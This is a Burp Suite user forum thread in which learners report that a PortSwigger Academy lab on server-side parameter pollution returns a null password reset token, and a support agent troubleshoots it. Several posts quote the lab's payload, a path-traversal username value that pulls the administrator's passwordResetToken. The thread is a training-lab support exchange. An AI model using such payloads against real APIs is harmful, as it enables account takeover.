Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Issue in an Academy Lab

Viktor | Last updated: Jan 04, 2024 04:12PM UTC

Hello it would seem that there is an issue with the Lab for: "Exploiting server-side parameter pollution in a REST URL". After the request for the passwordResetToken is submitted the response does not have a valid password reset token but the value is null Payload user: csrf=rHNJ6uYSDiGqDlMc5eYu9RMfjQWmVrQK&username=carlos%2f..%2f..%2f..%2fv1%2fusers%2fadministrator%2ffield%2fpasswordResetToken%23 Response: HTTP/1.1 500 Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Encoding: gzip Content-Length: 120 { "error": "Unexpected response from API server:\n{\n \"type\": \"passwordResetToken\",\n \"result\": null\n}" } This also happens if i use the example payload from the solution page.

Michelle, PortSwigger Agent | Last updated: Jan 05, 2024 09:20AM UTC

Hi I've just run through the lab and could solve it using the provided solution. I used the suggested payload from the solution, so the whole line looked like this: csrf=SgHtyMMe996rqgWWRsXggM4u3fYWq4Wh&username=../../v1/users/administrator/field/passwordResetToken%23 If you're still having issues, can you send an email to support@portswigger.net with screenshots or a screen recording of the steps you're taking?

Viktor | Last updated: Jan 08, 2024 11:29AM UTC

Thank you i've just send an email.

Michelle, PortSwigger Agent | Last updated: Jan 08, 2024 11:59AM UTC

Thanks :) We've got your mail. We'll take a look and be in touch soon.

Umer | Last updated: Jul 31, 2024 03:56AM UTC

Hi! Were you able to solve this? I am facing the exact same issue even after several months.

Umer | Last updated: Jul 31, 2024 03:56AM UTC

Hi! Were you able to solve this? I am facing the exact same issue even after several months.

Michelle, PortSwigger Agent | Last updated: Jul 31, 2024 12:18PM UTC

Hi I have successfully solved this lab in the past. What problems are you experiencing now? Have you clicked on the 'Forgot password' for the administrator user before using the payload to make sure a password reset token exists?

Umer | Last updated: Aug 01, 2024 03:40PM UTC

I was unable to solve it myself. I used the provided solution but instead of the reset_token. I get: { "error": "Unexpected response from API server:\n{\n \"type\": \"passwordResetToken\",\n \"result\": null\n}" } exactly same as mentioned above.

Michelle, PortSwigger Agent | Last updated: Aug 02, 2024 10:55AM UTC

Could you email a screen recording of the steps you're taking to support@portswigger.net please?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.